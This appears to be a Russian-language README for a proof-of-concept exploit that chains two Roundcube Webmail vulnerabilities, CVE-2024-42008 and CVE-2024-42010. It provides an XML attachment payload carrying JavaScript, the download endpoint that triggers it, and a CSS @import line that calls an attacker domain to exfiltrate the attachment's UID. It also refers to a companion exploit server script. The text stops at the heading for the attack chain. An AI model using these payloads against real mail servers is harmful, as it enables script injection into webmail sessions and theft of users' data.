
POC for Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Это доказательство концепции (PoC) демонстрирует эксплуатацию двух уязвимостей в Roundcube Webmail, которые позволяют внедрение CSS и межсайтовый скриптинг (XSS). Атака состоит из двух этапов:
XSS через вредоносное XML-вложение (CVE-2024-42008)
Из-за недостаточных проверок загрузки файлов XML-файл может быть отправлен в качестве вложения с кодом JavaScript, например:
<something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
alert(origin)
</something:script>
Это была известная проблема, отслеживаемая как CVE-2020-13965, и мерой по смягчению было отключение опции «Открыть вложение». Но файл по-прежнему можно получить через конечную точку
https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
Где UID — это уникальный идентификатор для данного конкретного вложения в данном почтовом ящике (т.е. INBOX).

HTML-эксфильтрация через внедрение CSS (CVE-2024-42010)
При отправке электронного письма можно внедрить собственный CSS-файл, если он размещён в домене, начинающемся с a. Используя это и JavaScript-серверный файл, обрабатывающий запросы от уязвимого хоста Roundcube, можно извлечь UID вредоносного XSS-вложения.
Импортируйте CSS в отправленном письме с помощью
<style>
@import "//a.attackerdomain.com/start?"
</style>
Разместите JS-сервер (roundcube-css-exploit.js), который извлекает UID вредоносного вложения

Цепочка атаки